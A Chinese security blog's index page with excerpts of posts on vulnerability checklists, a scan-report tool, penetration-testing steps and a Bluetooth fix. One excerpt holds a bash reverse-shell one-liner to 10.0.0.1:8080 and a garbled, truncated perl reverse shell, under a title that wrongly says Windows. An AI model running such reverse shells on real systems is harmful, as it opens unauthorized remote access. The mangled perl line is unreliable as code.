笔记
不秃头的安全
努力做到不脱发
展开
-
常见网站漏洞checklist
文章来源:Wangfly博客原文地址:https://www.hui-blog.cool/posts/97ef.html前言在做网站渗透之前除了关注一些通用漏洞,这些漏洞通常能很容易的利用扫描器扫出,被WAF所防护,然而有一些逻辑漏洞WAF和扫描器就无法发现了,就需要人工来测试,根据各行业的特点总结了下网站的常见漏洞checklist互联网行业p2p 金融行业电商行业政府行业转载 2022-12-02 12:19:42 · 160 阅读 · 0 评论 -
WaterExp#一款面向安服仔的扫描报告模板 和 碰瓷工具
一款面向安服仔的扫描报告模板 和 碰瓷工具原创 2022-09-06 09:45:20 · 1431 阅读 · 0 评论 -
Windows各种版本上传shell写法
#bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1#perl版本:perl -e ‘use Socket;i="10.0.0.1";i="10.0.0.1";i="10.0.0.1";p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in(p,inetaton(p,inet_aton(p,inetaton(i)))){o原创 2022-08-17 07:33:11 · 236 阅读 · 0 评论 -
渗透测试的基本流程
主要分为以下几步: 1. 明确目标 2. 信息收集 3. 漏洞探测(挖掘) 4. 漏洞验证(利用) 5. 提升权限 6. 清除痕迹 7. 事后信息分析 8. 编写渗透测试报告 1.1 明确目标 主要是确定需要渗透资产范围; 确定规则,如怎么去渗透; 确定需求,如客户需要达到一个什么样的效果。 1.2 信息收集 信息收集阶段主要是收集一些基础信息,系统信息,应用信息,版本信息,服务信息,人员信息以及相关防护信息。 信息收集大多是工具加手工进行收集信息,工原创 2022-08-12 21:35:20 · 134 阅读 · 0 评论 -
2021-03-18
标题记一次win10 联想Y7000更新驱动后蓝牙开关图标消失,且在设置中蓝牙开关也消失网上搜索各种禁用启动蓝牙服务,或设备管理器中串行总线控制器中未知USB设备重新启动都没用最后找到一个方法将所有连接电脑的所有线头或外设都拔掉,然后关机,关机后长按开机键20秒,此间为电脑释放静电操作,然后松开启动发现蓝牙开关键重回。同时也能连接蓝牙设备...原创 2021-03-18 13:18:24 · 74 阅读 · 0 评论